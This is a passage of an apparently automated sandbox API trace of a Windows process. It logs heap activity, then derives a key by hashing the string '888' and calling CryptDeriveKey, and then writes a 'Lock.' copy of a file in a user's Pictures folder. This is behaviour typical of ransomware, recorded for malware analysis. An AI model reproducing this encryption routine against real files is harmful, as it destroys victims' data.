lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0210.803] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.804] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa990 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7180 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.804] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.805] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.805] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.805] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0210.805] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.806] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.806] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0210.806] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0210.806] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.806] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0210.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0210.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0210.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f70c0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0210.807] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c330) returned 1 [0210.807] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.808] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.808] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.808] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.808] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab278, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0210.808] CryptCreateHash (in: hProv=0xa7c330, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0210.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c18, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.809] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0210.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0210.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a71c68, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0210.809] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.809] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.809] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0210.809] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab230, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0210.809] CryptHashData (hHash=0x9e1c38, pbData=0x2a71cb8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0210.809] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.810] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.810] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0210.810] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0210.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0210.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab380, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0210.810] CryptDeriveKey (in: hProv=0xa7c330, Algid=0x6601, hBaseData=0x9e1c38, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2238) returned 1 [0210.810] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.810] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.810] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0210.810] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0210.811] CryptDestroyHash (hHash=0x9e1c38) returned 1 [0210.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/LXxgX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lxxgx8.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0210.812] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0210.812] SetFilePointerEx (in: hFile=0x520, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa918 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0210.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0210.812] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b78 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.812] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0210.812] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a74808 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0210.813] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures/" (normalized: "c:\\users\\fd1hvy\\pictures")) returned 0x11 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74808 | out: hHeap=0x2af0000) returned 1 [0210.813] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0210.813] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a930 [0210.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0210.814] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0210.814] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures/Lock.LXxgX8.png" (normalized: "c:\\users\\fd1hvy\\pictures\\lock.lxxgx8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0210.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6f20 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0210.815] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0210.815] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0210.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ea40 | out: hHeap=0x2af0000) returned 1 [0210.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0210.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0210.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0210.816] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0210.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0210.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0210.816] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0210.816] HeapFree (in: 